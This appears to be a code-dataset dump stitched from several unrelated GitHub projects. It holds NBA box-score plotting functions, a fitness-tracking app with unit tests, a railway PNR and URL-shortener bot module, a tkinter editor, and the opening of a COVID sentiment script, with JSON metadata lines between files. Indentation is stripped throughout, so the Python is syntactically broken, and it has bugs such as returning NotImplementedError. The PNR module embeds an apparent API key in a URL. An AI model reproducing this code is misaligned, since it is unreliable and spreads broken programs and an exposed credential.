"""
team_box_scores = []
df = get_existing_data_frame(csv, logger=logger)
daily_box_scores, found_date = get_daily_box_scores(date_obj=date)
for team in daily_box_scores.keys():
team_box_scores.append(TeamBoxScore(box_scores=daily_box_scores[team],
team_box_score=[],
team_name=team,
date=found_date))
new_df = create_data_frame_from_team_box_scores(team_box_scores=team_box_scores, logger=logger)
if df is None:
logger.info('There was not an existing data frame.')
df = new_df
else:
logger.info('Appending new data frame of shape: %s' % (new_df.shape,))
temp_df = df.append(new_df, sort=False)
temp_size = temp_df.shape[0]
# add new columns with ops from existing data
temp_df['minutes_played'] = temp_df['seconds_played'].apply(convert_to_minutes)
temp_df['true_shooting'] = temp_df.apply(
lambda x: get_true_shooting(x['points'],
x['attempted_field_goals'],
x['attempted_three_point_field_goals'],
x['attempted_free_throws']),
axis=1)
temp_df['assist_turnover_ratio'] = temp_df.apply(
lambda x: get_assist_turnover_ratio(x['assists'],
x['turnovers']),
axis=1)
temp_df.drop_duplicates(inplace=True)
temp_size = temp_size - temp_df.shape[0]
logger.info('Dropped %s duplicates' % temp_size)
logger.info('Dropped %s duplicates' % temp_size)
df = temp_df
logger.info('Shape of DataFrame object: %s' % (df.shape,))
df.to_csv(csv)
return df
def create_data_frame_from_team_box_scores(team_box_scores, logger):
"""
Creates a pandas data frame object from a list of team box score objects.
:param list team_box_scores: Team box score objects
:param logger: Instance of logger object
:return: Pandas data frame
:rtype: pd.DataFrame
"""
logger.info(" Appending new data frame from %s teams" % len(team_box_scores))
data = {}
index = []
for stat in Vars.supported_stats:
data[stat] = []
for tbs in team_box_scores:
index.extend(tbs.get_players())
data['points'].extend(tbs.get_points())
data['rebounds'].extend(tbs.get_rebounds())
data['assists'].extend(tbs.get_assists())
data['made_field_goals'].extend(tbs.get_made_field_goals())
data['made_three_point_field_goals'].extend(tbs.get_made_three_point_field_goals())
data['made_free_throws'].extend(tbs.get_made_free_throws())
data['offensive_rebounds'].extend(tbs.get_offensive_rebounds())
data['defensive_rebounds'].extend(tbs.get_defensive_rebounds())
data['team'].extend(tbs.get_teams())
data['location'].extend(tbs.get_locations())
data['opponent'].extend(tbs.get_opponents())
data['outcome'].extend(tbs.get_outcomes())
data['seconds_played'].extend(tbs.get_seconds_played())
data['attempted_three_point_field_goals'].extend(tbs.get_attempted_three_point_field_goals())
data['attempted_free_throws'].extend(tbs.get_attempted_free_throws())
data['attempted_field_goals'].extend(tbs.get_attempted_field_goals())
data['steals'].extend(tbs.get_steals())
data['blocks'].extend(tbs.get_blocks())
data['turnovers'].extend(tbs.get_turnovers())
data['personal_fouls'].extend(tbs.get_personal_fouls())
data['game_score'].extend(tbs.get_game_scores())
data['date'].extend(tbs.get_dates())
if data['team']:
teams = list(set(data['team']))
for team in teams:
logger.info(' %s' % team)
df = pd.DataFrame(data, index=index)
return df
def get_team_date_df(df, team, date):
"""
Attempts to make a pandas data frame of all player box scores on a certain day.
:param pandas.DataFrame df: The data frame to search.
:param str team: The team to search for.
:param datetime.datetime date: The date to search on.
:return: Team data frame if found
"""
team_df = None
if isinstance(date, datetime.datetime):
converted_date = date.strftime('%y_%m_%d')
team_df = df[(df['date'] == converted_date) & (df['team'] == team)]
return team_df
def filter_df_on_team_names(df, teams):
"""
Returns a new data frame object only containing rows where the team matches any of the provided team names.
:param pandas.DataFrame df: The data frame to search.
:param list teams: The teams to filter on.
:return: Team filtered data frame, or the original if none of the specified teams are found.
"""
teams = [entry.upper().replace(' ', '_') for entry in teams]
team_df = df[df['team'].isin(teams)]
return team_df
def get_most_recent_update_date(df, date_col='date'):
"""
Gets the most recent date from the pandas.DataFrame provided.
:param pandas.DataFrame df: The pandas.DataFrame object
:param str date_col: The column to reference in the DataFrame object
:return: The date found
:rtype: datetime.datetime
"""
temp_series = pd.to_datetime(df[date_col], format='%y_%m_%d')
temp_date = str(temp_series.max()).split()[0].split('-')
return datetime.datetime(year=int(temp_date[0]), month=int(temp_date[1]), day=int(temp_date[2]))
def get_team_result_on_date(team, date, df):
"""
Calculates the team scores on a particular date.
:param str team: Team to search for
:param datetime.datetime date: The date to search on
:param pandas.DataFrame df: The data set to search in
:return: The score as a string, ex: 97-88. The desired team's score will always be first.
"""
converted_team = team.replace(' ', '_').upper()
converted_date = date.strftime('%y_%m_%d')
team_df = df[(df['team'] == converted_team) & (df['date'] == converted_date) & (df['points'] > 0)]
opp_team = team_df['opponent'].values[0]
opp_df = df[(df['team'] == opp_team) & (df['date'] == converted_date) & (df['points'] > 0)]
res = '%s-%s' % (int(np.sum(team_df['points'])), int(np.sum(opp_df['points'])))
return res
def create_scatter_plot_with_trend_line(x_key, y_key, df, **kwargs):
"""
Creates a scatter plot for two different series of a pandas data frame.
:param str x_key: The column name in the data frame to use for the x axis.
:param str y_key: The column name in the data frame to use for the x axis.
:param pandas.DataFrame df: The data frame object.
Supported kwargs:
bool grid: Indicates if a grid should be added to the plot.
int num_outliers: The number of outliers to label on the plot.
list teams: The team names to filter on if wanted.
int min_seconds: The minimum number of seconds played to filter on if needed.
int max_seconds: The maximum number of seconds played to filter on if needed.
str save_path: The path to save the png file created.
bool show_plot: Indicates if the png should be shown during execution.
bool trend_line: Indicates if a trend line should be shown.
:return: The save path of the created png, the outlier DataFrame, the filtered DataFrame.
:rtype: tuple
"""
teams = kwargs.get('teams', None)
save_path = kwargs.get('save_path', None)
show_plot = kwargs.get('show_plot', False)
min_seconds = kwargs.get('min_seconds', 0)
max_seconds = kwargs.get('max_seconds', 6000)
num_outliers = kwargs.get('num_outliers', 5)
grid = kwargs.get('grid', True)
trend_line = kwargs.get('trend_line', True)
if num_outliers > 15:
num_outliers = 15
# filters
if teams is not None and isinstance(teams, list):
df = filter_df_on_team_names(df, teams)
if min_seconds is not None and isinstance(min_seconds, int):
if min_seconds >= 60:
df = df[df['seconds_played'] >= min_seconds]
else:
df = df[df['minutes_played'] >= min_seconds]
if max_seconds is not None and isinstance(max_seconds, int):
if max_seconds >= 60:
df = df[df['seconds_played'] <= max_seconds]
else:
df = df[df['minutes_played'] <= max_seconds]
temp_df = df[[x_key, y_key]]
# find outliers
series_size = temp_df[y_key].shape[0]
if series_size > num_outliers:
thresh = sorted(temp_df[y_key].to_list())[-num_outliers]
else:
thresh = 0
outlier_df_full = df[df[y_key] >= thresh]
main_df = temp_df[temp_df[y_key] < thresh]
title = '%s vs %s (%s samples)' % (x_key.title().replace('_', ' '),
y_key.title().replace('_', ' '),
series_size)
outlier_df = temp_df[temp_df[y_key] >= thresh]
# plot main df and outliers
fig, ax = plt.subplots(figsize=(10, 6))
main_df.plot(kind='scatter', x=x_key, y=y_key, grid=grid, ax=ax)
outlier_df.plot(kind='scatter', x=x_key, y=y_key, grid=grid, ax=ax)
ax.set_xlabel(x_key.title().replace('_', ' '))
ax.set_ylabel(y_key.title().replace('_', ' '))
# add point labels
for k, v in outlier_df.iterrows():
temp_split = k.split(' ')
name = '%s.%s.' % (temp_split[0][:1], temp_split[1][:3])
ax.annotate(name, v, xytext=(5, -5), textcoords='offset points')
# create trend line
if trend_line:
x = df[x_key]
y = df[y_key]
z = np.polyfit(x, y, 1)
p = np.poly1d(z)
plt.plot(x, p(x), "r--", label='Trend')
plt.legend(loc='lower right')
# makes things fit on graph window
plt.title(title)
plt.tight_layout()
# handle output
plot_path = None
if save_path is not None:
if os.path.isdir(save_path):
if not os.path.exists(os.path.join(save_path, 'plots')):
os.mkdir(os.path.join(save_path, 'plots'))
ymd = datetime.datetime.now().strftime("%y%m%d")
plot_path = os.path.join(save_path, 'plots', '%s_VS_%s_%s' % (x_key, y_key, ymd))
plt.savefig(plot_path)
else:
if save_path == 'svg_buffer':
fig_file = io.StringIO()
plt.savefig(fig_file, format='svg', bbox_inches='tight')
fig_data_svg = '<svg' + fig_file.getvalue().split('<svg')[1]
fig_file.close()
plot_path = fig_data_svg
else:
# save at the path given
plt.savefig(save_path)
plot_path = save_path
plt.clf()
plt.cla()
plt.close('all')
if show_plot:
plt.show()
return plot_path, outlier_df_full, df
def create_date_plot(y_key, player, df, **kwargs):
"""
Creates a plot of player data based on a given key.
:param y_key: The stat to filter on
:param str player: The name of the player to search for
:param pandas.DataFrame df: The pandas.DataFrame object to search in
Supported kwargs:
save_path: The path to save the plot to or the type of plot to save
show_plot: Determines if the plot should be shown to the user
min_seconds: The minimum seconds to filter on
max_seconds: The maximum seconds to filter on
num_outliers: The number of outlier data points to collect
grid: Determines if both x and y axis grids should be used, or just one or the other
mean_line: Determines if a mean line should be shown of all collected data points
:return: The path of the created plot, outlier pandas.DataFrame object, full pandas.DataFrame object.
:rtype: tuple
"""
save_path = kwargs.get('save_path', None)
show_plot = kwargs.get('show_plot', False)
min_seconds = kwargs.get('min_seconds', 0)
max_seconds = kwargs.get('max_seconds', 6000)
num_outliers = kwargs.get('num_outliers', 5) # todo
grid = kwargs.get('grid', 'both')
mean_line = kwargs.get('mean_line', True)
plot_path = None
outlier_df = None
# filters
perform_plot = True
if player is not None and isinstance(player, str):
if np.any(df.index.isin([player])):
df = df[df.index.isin([player])]
else:
# we don't want to try if the player name is invalid
perform_plot = False
plot_path = 'Invalid player name of %s' % player
if isinstance(min_seconds, int) and isinstance(max_seconds, int):
if max_seconds > min_seconds:
if min_seconds >= 60:
df = df[df['seconds_played'] >= min_seconds]
else:
df = df[df['minutes_played'] >= min_seconds]
if max_seconds >= 60:
df = df[df['seconds_played'] <= max_seconds]
else:
df = df[df['minutes_played'] <= max_seconds]
else:
plot_path = 'Max seconds < Min seconds'
perform_plot = False
else:
plot_path = 'Max/Min seconds incorrect type %s %s' % (type(min_seconds), type(max_seconds))
perform_plot = False
if perform_plot and df.shape[0] > 0:
outlier_df = df.sort_values(by=[y_key], ascending=False)
outlier_df = outlier_df.head(n=num_outliers)
df['datetime'] = pd.to_datetime(df['date'], format='%y_%m_%d')
x_key = 'datetime'
temp_df = df[[x_key, y_key]]
series_size = temp_df[y_key].shape[0]
title = '%s: %s (%s samples)' % (player,
y_key.title().replace('_', ' '),
series_size)
data_mean = np.mean(temp_df[y_key])
fig, ax = plt.subplots(figsize=(10, 6))
temp_df.plot(kind='line', x=x_key, y=y_key, style='.', ms=10, ax=ax)
if mean_line:
plt.axhline(y=data_mean, label='Mean: %s' % np.round(data_mean, 1), color='red')
plt.legend(loc='best')
ax.set_xlabel('Date (month-day)')
ax.set_ylabel(y_key.title().replace('_', ' '))
ax.set_xlim([ax.get_xlim()[0] - 2, ax.get_xlim()[1] + 2])
# calc x tick dates
start, end = ax.get_xlim()[0], ax.get_xlim()[1]
if (end - start) > 0:
ticks_needed = (end - start) / 4
x_ticks = [end]
for i in range(np.cast['int'](ticks_needed)):
temp_tick = start + (i * 4)
x_ticks.append(temp_tick)
ax.set_xticks(x_ticks)
date_format = plt_dates.DateFormatter('%m-%d')
ax.xaxis.set_major_formatter(date_format)
# calc y tick dates
top = ax.get_ylim()[1]
if top >= 30:
y_ticks = [0]
temp_tick = 5
while temp_tick < top:
y_ticks.append(temp_tick)
temp_tick += 5
ax.set_yticks(y_ticks)
if grid != 'none':
if grid == 'x':
ax.grid(axis='x')
elif grid == 'y':
ax.grid(axis='y')
else:
ax.grid()
plt.title(title)
plt.tight_layout()
# handle output
if save_path is not None:
if os.path.isdir(save_path):
if not os.path.exists(os.path.join(save_path, 'plots')):
os.mkdir(os.path.join(save_path, 'plots'))
ymd = datetime.datetime.now().strftime("%y%m%d")
plot_path = os.path.join(save_path, 'plots', '%s_VS_%s_%s' % (x_key, y_key, ymd))
plt.savefig(plot_path)
else:
if save_path == 'svg_buffer':
fig_file = io.StringIO()
plt.savefig(fig_file, format='svg', bbox_inches='tight')
fig_data_svg = '<svg' + fig_file.getvalue().split('<svg')[1]
fig_file.close()
plot_path = fig_data_svg
else:
# save at the path given
plt.savefig(save_path)
plot_path = save_path
plt.clf()
plt.cla()
plt.close('all')
if show_plot:
plt.show()
return plot_path, outlier_df, df
def create_bar_plot(df, bar_items, save_path=None, show_plot=False, team=None, date=None):
"""
Creates a stacked bar graph with any number of column names for a team.
:param pandas.DataFrame df: Data frame to use.
:param list bar_items: Column names within the data frame.
:param str save_path: The path to save the png file created.
:param bool show_plot: Indicates if the png should be shown during execution.
:param str team: Optional team name to add to plot title.
:param datetime.datetime date: Optional date to add to plot title.
:return: Save path if save successful.
"""
fig, ax = plt.subplots(figsize=(10, 8))
margin_bottom = np.zeros(df.shape[0])
colors = ['#17408B', '#C9082A', '#552084', '#FDBA21']
title = ''
for index, item in enumerate(bar_items):
values = df[item].to_list()
df.plot.bar(y=item, ax=ax, stacked=True, bottom=margin_bottom, color=colors[index], rot=45, label=item)
margin_bottom += values
title += '%s ' % item.title()
if team is not None:
if isinstance(team, str):
title = '%s %s' % (convert_team_name(team), title)
if date is not None:
if isinstance(date, datetime.datetime):
title = '%s %s' % (title, date.strftime('%y_%m_%d'))
ax.set_title(title)
plt.tight_layout()
# handle output
plot_path = None
if save_path is not None:
if os.path.isdir(save_path):
if not os.path.exists(os.path.join(save_path, 'plots')):
os.mkdir(os.path.join(save_path, 'plots'))
if date is None:
ymd = datetime.datetime.now().strftime("%y%m%d")
plot_path = os.path.join(save_path, 'plots', '%s_%s' % (title.replace(' ', '_'), ymd))
else:
plot_path = os.path.join(save_path, 'plots', title.replace(' ', '_'))
plt.savefig(plot_path)
if show_plot:
plt.show()
return plot_path
# ----------------------------------------------------------------------------------------------------------------------
# End
# ----------------------------------------------------------------------------------------------------------------------
``` |
{
"source": "JI511/Personal_Fitness",
"score": 3
} |
#### File: src/Procedures/body_weight.py
```python
import logging
from src.Util.constants import Constants
from src.Util import utilities as util
from src.Procedures.procedure import Procedure
class BodyWeightProcedure(Procedure):
"""
Class for handling body weight procedures and functions.
"""
def __init__(self, output_dir=None):
"""
Setup for body weight procedure.
:param output_dir: Optional output directory if not the default.
"""
super(BodyWeightProcedure, self).__init__(table='body_weight',
output_dir=output_dir,
query=Constants.body_weight_query,
logger=logging.getLogger(__name__),
names=['body_weight'])
self.logger.info("Body weight tracking and calculations")
def get_new_data(self, connection):
"""
Get the input value from the user for body weight procedure.
"""
new_data = []
while True:
self.logger.info('Getting input for new body weight entry.')
weight_text = input("What did you weigh today?\n")
if weight_text != 'q':
try:
new_data.append(int(weight_text))
self.append_new_entry(connection=connection,
values=new_data,
column_names=self.names)
break
except ValueError:
print('Invalid option, please enter a valid number.')
else:
self.logger.info("User backed out before new entry added.")
break
return new_data, self.names
def get_new_data_from_file(self, connection):
"""
Appends multiple entries to the database with values read from a file
:param connection: Connection to the database.
:return: All values added to the database
"""
self.logger.info('Getting multiple values from file')
weight_text = input("What file would you like to use?\n")
values = util.read_file_values(file_path=weight_text,
logger=self.logger)
if values is not None:
for value in values:
self.append_new_entry(connection=connection,
values=[value],
column_names=self.names)
else:
self.logger.error("Bad path provided, aborting updates")
return values
# ----------------------------------------------------------------------------------------------------------------------
# End
# ----------------------------------------------------------------------------------------------------------------------
```
#### File: src/Procedures/weight_lifting.py
```python
import logging
from src.Util.constants import Constants
from src.Util import constants as const
from src.Procedures.procedure import Procedure
class WeightLiftingProcedure(Procedure):
"""
Class for handling weight lifting procedures and functions.
"""
def __init__(self, output_dir=None):
"""
Setup for weight lifting procedure.
:param output_dir: Optional output directory if not the default.
"""
super(WeightLiftingProcedure, self).__init__(table='weight_lifting',
output_dir=output_dir,
query=Constants.weight_lifting_compound_query,
logger=logging.getLogger(__name__),
names=None)
self.logger.info("Weight lifting tracking and calculations.")
def get_new_data(self, connection):
"""
Adds a new entry into the weight lifting table within the health_database database.
:param connection: Connection to the database.
"""
self.logger.info('Getting input for new weight lifting entry.')
names = self.get_workout_item_names(
group=self.determine_muscle_group('Which muscle groups did you work today?'))
# check if names is empty
values = []
if names:
while True:
use_default = input("Would you like to use default values based on current max?\n"
"y: yes\n"
"n: no\n")
if use_default == 'y':
self.append_new_entry(connection=connection,
values=self.get_default_lift_values(names=names),
column_names=names)
values = self.get_default_lift_values(names=names)
break
elif use_default == 'n':
return NotImplementedError
print('Please enter a valid option')
return values, names
def get_new_data_from_file(self, connection):
"""
Appends multiple entries to the database with values read from a file
:param connection: Connection to the database.
:return: All values added to the database
"""
return NotImplementedError
def get_max_lift_updates(self):
"""
Updates the user selected max lift values by getting input from the user.
"""
names = self.determine_muscle_group(question_text='Which max values would you like to update?')
max_lift_names = list()
if 'bench_press' in names:
max_lift_names.append('bench_press_max')
if 'squat' in names:
max_lift_names.append('squat_max')
if 'shoulder_press' in names:
max_lift_names.append('shoulder_press_max')
if 'deadlift' in names:
max_lift_names.append('deadlift_max')
max_lift_values = []
for row in max_lift_names:
while True:
max_text = input(("New " + row + "value:\n").replace("_", " "))
try:
max_update = int(max_text)
max_lift_values.append(max_update)
break
except ValueError:
print('Invalid literal, please enter a number.')
return max_lift_values, max_lift_names
@staticmethod
def get_default_lift_values(names):
"""
Get the current program lifting values for the day. This is to speed up input if the user is following
a program.
:param names:
:return: The default values
"""
values = []
for i in range(len(names)):
values.append(i)
return values
@staticmethod
def get_workout_item_names(group):
"""
Gets the column names for the specified workout group.
:param List group: The user chosen compound lifts.
:return: A list of Strings containing the column names to update.
"""
names = [a[0] for a in const.generate_sets_item_query(names=group,
sets=6)]
return names
@staticmethod
def determine_muscle_group(question_text=''):
"""
Gets a binary input from the user to select the chosen compound lifts to update.
:param str question_text: Question for the user to determine which procedure is asking about compounds.
:return: A list of Strings containing the chosen compound lifts.
"""
muscle_groups = list()
while True:
groups = input(question_text + " (Binary Entry)\n"
"8: Bench\n"
"4: Squat\n"
"2: Shoulder Press\n"
"1: Deadlift\n"
"q: Quit\n")
if groups != 'q':
try:
result = int(groups)
if result > 0:
break
else:
print('Please enter a positive integer value.')
except ValueError:
print('Invalid literal, please enter a number.')
else:
result = 0
break
if (result & Vars.Bench) == 8:
muscle_groups.append("bench_press")
if (result & Vars.Squat) == 4:
muscle_groups.append("squat")
if (result & Vars.Shoulder_Press) == 2:
muscle_groups.append("shoulder_press")
if (result & Vars.Deadlift) == 1:
muscle_groups.append("deadlift")
return muscle_groups
@staticmethod
def determine_accessories():
"""
Similar to determine_muscle_group(), this gets the user chosen accessory values.
:return: todo
"""
while True:
accessories = input("Would you life to use default accessories?\n"
"y: yes\n"
"n: no\n")
if accessories == 'y':
break
elif accessories == 'n':
break
def view_data(self, connection, column_names=None):
return NotImplementedError
class Vars(object):
"""
Class to store the enum values for compound lifts.
"""
Bench = 8
Squat = 4
Shoulder_Press = 2
Deadlift = 1
# ----------------------------------------------------------------------------------------------------------------------
# End
# ----------------------------------------------------------------------------------------------------------------------
```
#### File: tests/Procedures/test_body_weight.py
```python
import unittest
import tempfile
import os
import shutil
import datetime
from src.Util import database_api as db_api
from src.Procedures import body_weight
from src.Procedures import procedure
class TestBodyWeightProcedure(unittest.TestCase):
"""
Class for testing the body weight procedure.
"""
def setUp(self):
"""
Initializes unit test variables.
"""
self.logs_dir = tempfile.mkdtemp()
self.connection = db_api.create_connection(db_path=os.path.join(self.logs_dir, 'test_database.db'))
self.procedure = body_weight.BodyWeightProcedure(output_dir=self.logs_dir)
self.input_values = []
def mock_input(_):
"""
Fake input function in order to test input calls in unit tests.
"""
return self.input_values.pop(0)
body_weight.input = mock_input
procedure.input = mock_input
db_api.create_table(connection=self.connection,
table=self.procedure.table,
query=self.procedure.query)
for _ in range(5):
unique_id = db_api.add_new_row(connection=self.connection,
table=self.procedure.table)
db_api.update_item(connection=self.connection,
table=self.procedure.table,
value_tuple=(100, unique_id),
column_names=['body_weight'])
def tearDown(self):
"""
Performs any clean up needed.
"""
self.connection = None
if os.path.exists(self.logs_dir):
shutil.rmtree(self.logs_dir)
# ------------------------------------------------------------------------------------------------------------------
# get_new_data tests
# ------------------------------------------------------------------------------------------------------------------
def test_get_new_data_nominal(self):
"""
Provides mock user input for a body weight entry.
"""
self.input_values = ['100']
result, name = self.procedure.get_new_data(connection=self.connection)
self.assertEqual(result, [100])
self.assertEqual(name, ['body_weight'])
def test_get_new_data_bad_input(self):
"""
The first input value shall be rejected and the second accepted.
:return:
"""
self.input_values = ['a', '100']
result, name = self.procedure.get_new_data(connection=self.connection)
self.assertEqual(result, [100])
def test_get_new_data_quit(self):
"""
The user needs to be able to exit the input prompt screen why a 'q' is provided.
"""
self.input_values = ['q']
result, name = self.procedure.get_new_data(connection=self.connection)
self.assertEqual(result, [])
# ------------------------------------------------------------------------------------------------------------------
# get_new_data_from_file tests
# ------------------------------------------------------------------------------------------------------------------
def test_get_new_data_from_file_nominal(self):
"""
Adds multiple values to database via text file.
"""
path = os.path.join(os.getcwd(), r'tests\support_files\body_weight_inputs.txt')
self.input_values = [str(path)]
self.procedure.get_new_data_from_file(connection=self.connection)
column_dict = db_api.get_table_columns_dict(connection=self.connection,
table=self.procedure.table,
column_names=['body_weight'])
self.assertEqual(column_dict['body_weight'], [100, 100, 100, 100, 100, 10, 20, 30, 40,
50, 60, 70, 80, 90, 100])
# ------------------------------------------------------------------------------------------------------------------
# view_data tests
# ------------------------------------------------------------------------------------------------------------------
def test_view_data_nominal(self):
"""
Creates a plot from body weight entries.
"""
self.procedure.view_data(connection=self.connection)
plot_name = 'body_weight_body_weight_%s.png' % datetime.datetime.now().strftime('%m_%d')
self.assertTrue(os.path.exists(os.path.join(self.logs_dir, plot_name)))
def test_view_data_bad_column_names(self):
"""
Attempts to create a plot with an invalid column name.
"""
self.procedure.view_data(connection=self.connection,
column_names=['bad'])
plot_name = 'body_weight_body_weight_%s.png' % datetime.datetime.now().strftime('%m_%d')
self.assertFalse(os.path.exists(os.path.join(self.logs_dir, plot_name)))
# ------------------------------------------------------------------------------------------------------------------
# table_to_csv tests
# ------------------------------------------------------------------------------------------------------------------
def test_dump_csv_nominal(self):
"""
Creates a csv file from values within the database table.
"""
csv_name = db_api.table_to_csv(connection=self.connection,
table=self.procedure.table,
output_dir=self.logs_dir)
self.assertTrue(os.path.exists(os.path.join(self.logs_dir, csv_name)))
def test_dump_csv_bad_path(self):
"""
Attempts to create a csv file but a bad output path is provided.
:return:
"""
csv_name = db_api.table_to_csv(connection=self.connection,
table=self.procedure.table,
output_dir='bad_path')
self.assertEqual(None, csv_name)
# ----------------------------------------------------------------------------------------------------------------------
# End
# ----------------------------------------------------------------------------------------------------------------------
```
#### File: tests/Util/test_config.py
```python
import unittest
import tempfile
import os
import shutil
import logging
from src.Util.config import Config
from src.Util.constants import Constants
class TestConfig(unittest.TestCase):
"""
Class for testing the body weight procedure.
"""
def setUp(self):
"""
Initializes unit test variables.
"""
self.logs_dir = tempfile.mkdtemp()
self.file_path = os.path.join(self.logs_dir, 'test_config.ini')
self.logger = logging.getLogger(__name__)
self.config = Config(logger=self.logger,
output_path=self.logs_dir)
self.section = 'OPTIONS'
self.option = 'water'
def tearDown(self):
"""
Performs any clean up needed.
"""
self.connection = None
if os.path.exists(self.logs_dir):
shutil.rmtree(self.logs_dir)
# ------------------------------------------------------------------------------------------------------------------
# read_config_option tests
# ------------------------------------------------------------------------------------------------------------------
def test_read_config_option_nominal(self):
"""
Checks that the default config file is created properly.
"""
value = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(value, "oz")
def test_read_config_option_bad_option(self):
"""
Attempts to get a bad value in the config file.
"""
with self.assertRaises(KeyError) as error:
self.config.read_config_option(section=self.section,
option="bad")
self.assertTrue('bad' in error.exception)
# ------------------------------------------------------------------------------------------------------------------
# update_config_option tests
# ------------------------------------------------------------------------------------------------------------------
def test_update_config_option_nominal(self):
"""
Updates a config value to be used in the future.
"""
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
water_type = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(value, water_type)
def test_update_config_retain_unique_values(self):
"""
Updating an option should keep unaffected values the same when rewriting.
"""
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
value = '5'
status = self.config.update_config_option(section=self.section,
option='backup_rate',
value=value)
self.assertTrue(status)
water_type = self.config.read_config_option(section=self.section,
option=self.option)
backup_rate = self.config.read_config_option(section=self.section,
option='backup_rate')
self.assertEqual(water_type, 'mL')
self.assertEqual(backup_rate, '5')
def test_update_config_option_bad_section(self):
"""
Attempts to change a config option with a section that does not exist.
"""
status = self.config.update_config_option(section='bad',
option=self.option,
value='mL')
self.assertFalse(status)
def test_update_config_option_bad_option(self):
"""
Attempts to change a config option that does not exist.
"""
status = self.config.update_config_option(section=self.section,
option='bad',
value='mL')
self.assertFalse(status)
# ------------------------------------------------------------------------------------------------------------------
# check_config_file_values tests
# ------------------------------------------------------------------------------------------------------------------
def test_check_config_file_values_nominal(self):
"""
A new default has been added to a section. Add the default value to an already existing config file. The old
config values will remain.
"""
Constants.config_defaults[self.section]['test'] = 'new'
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
self.config.check_config_file_values()
added_default = self.config.read_config_option(section=self.section,
option='test')
self.assertEqual(added_default, 'new')
old_value = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(old_value, 'mL')
# ------------------------------------------------------------------------------------------------------------------
# create_backup_database tests
# ------------------------------------------------------------------------------------------------------------------
def test_create_backup_database_nominal(self):
"""
Creates a backup database when no other backups are present
"""
pass
def test_create_backup_database_already_exists(self):
"""
Checks for a backup database file, and sees that one has been created within the backup rate.
"""
pass
def test_create_backup_database_needed(self):
"""
Checks for a backup database file, one does exist, but a new one is needed.
"""
pass
def test_create_backup_database_no_backup_db_folder(self):
"""
Creates the backup_db folder within the cwd if it does not already exist.
"""
pass
# ----------------------------------------------------------------------------------------------------------------------
# End
# --------------------------------------------------------------------------------------------------------------------
``` |
{
"source": "jia1102x/Anupam-dagaru",
"score": 3
} |
#### File: Anupam-dagaru/omega/pnr.py
```python
import requests
class Pnr(object):
def __init__(self):
self.ids = {}
#json = requests.get("https://api.coinmarketcap.com/v1/ticker/").json()
#for cr in json:
#self.ids[cr["symbol"]] = cr["id"]
def get_pnr(self, pnrno):
try:
json = requests.get("https://api.railwayapi.com/v2/pnr-status/pnr/"+pnrno+"/apikey/qyynupcty2/").json()
passenger = "\n"
for i in range(0,json["passengers"].__len__()):
passenger+="**"+str(json["passengers"][i]["no"])+"\t"+json["passengers"][i]["current_status"]+"\t"+json["passengers"][i]["booking_status"]+"**\n"
message = "PNR Number : **{}**\n From : **{}** - **{}**\n To : **{}** - **{}**\nTrain Name :**{}**\nTrain Number :**{}**\nPassengers:{}".format(pnrno, json["from_station"]["code"],json["from_station"]["name"], json["reservation_upto"]["code"],json["reservation_upto"]["name"],json["train"]["name"],json["train"]["number"],passenger)
return message
except KeyError:
message = "Enter a valid PNR number"
return message
```
#### File: Anupam-dagaru/omega/shorturl.py
```python
import requests
import json
class Urlshortener(object):
def __init__(self):
self.req_url = 'https://www.googleapis.com/urlshortener/v1/url?key=<KEY>'
self.headers = {'content-type': 'application/json'}
def get_shorturl(self, content):
self.payload = {'longUrl': content[2]}
self.response = requests.post(self.req_url,data = json.dumps(self.payload), headers=self.headers).json()
return self.response['id']
``` |
{
"source": "jia1995/tkinter_learning",
"score": 3
} |
#### File: tkinter_learning/Imitation vscode editor/textEidtor.py
```python
import tkinter as tk
from tkinter import *
from textwithLine import TextWithLine
def cut(editor, event=None):
k = editor.tag_ranges('sel')
if not k:
idx = editor.index(tk.INSERT)
line = idx.split('.')[0]
editor.tag_add('sel',f'{line}.0',f'{int(line)+1}.0')
editor.event_generate("<<Cut>>")
else:
editor.event_generate("<<Cut>>")
def copy(editor, event=None):
k = editor.tag_ranges('sel')
if not k:
idx = editor.index(tk.INSERT)
line = idx.split('.')[0]
lens = len(editor.get('1.0', tk.END))
editor.tag_add('sel',f'{line}.0',f'{line}.{lens}')
editor.event_generate("<<Copy>>")
editor.tag_remove('sel', '0.0', tk.END)
else:
editor.event_generate("<<Copy>>")
def paste(editor, event=None):
editor.event_generate('<<Paste>>')
def selectAll(editor, event=None):
editor.tag_add('sel','1.0',tk.END)
def undo(editor, event=None):
editor.event_generate('<<Undo>>')
def redo(editor, event=None):
editor.event_generate('<<Redo>>')
class TextEditor(tk.Frame):
def __init__(self, master=None) -> None:
tk.Frame.__init__(self, master)
self.CreateText()
def _create_right_popup_menu(self):
PopupMenu = Menu(self.editbox.text, tearoff=0)
PopupMenu.add_command(label='剪切',command=lambda:cut(self.editbox.text))
PopupMenu.add_command(label='复制',command=lambda:copy(self.editbox.text))
PopupMenu.add_command(label='粘贴',command=lambda:paste(self.editbox.text))
PopupMenu.add_command(label='全选',command=lambda:selectAll(self.editbox.text))
return PopupMenu
def CreateText(self):
self.editbox = TextWithLine(self.master)
self.editbox.pack(expand=YES,side=RIGHT, fill=BOTH)
PopupMenu = self._create_right_popup_menu()
self.editbox.text.bind('<Button-3>',lambda event : PopupMenu.post(event.x_root, event.y_root))
``` |
{
"source": "JiA1996/RBDA_Covid_Tweets_Trend_Analysis",
"score": 3
} |
#### File: RBDA_Covid_Tweets_Trend_Analysis/DeathSentimentCorrelation/death_data_total.py
```python
from pyspark import SparkContext
import numpy as np
import sys, getopt
from pyspark.mllib.stat import Statistics
def parseLine(line):
k = 0
s = ""
for i in line:
if i == "\"":
k += 1
elif i == ",":
if k % 2 == 0:
s += ","
else:
s += " "
else:
s += i
return s
def combineSeries(a, b):
out = []
for i in range(len(a)):
out.append(a[i] + b[i])
return out
def dailyIncrease(l):
out = []
for i in range(1, len(l)):
out.append(int(l[i]) - int(l[i-1]))
return out
if __name__ == "__main__":
cov = sys.argv[1]
senti = sys.argv[2]
#output = sys.argv[2]
sc=SparkContext("local", "death_trend")
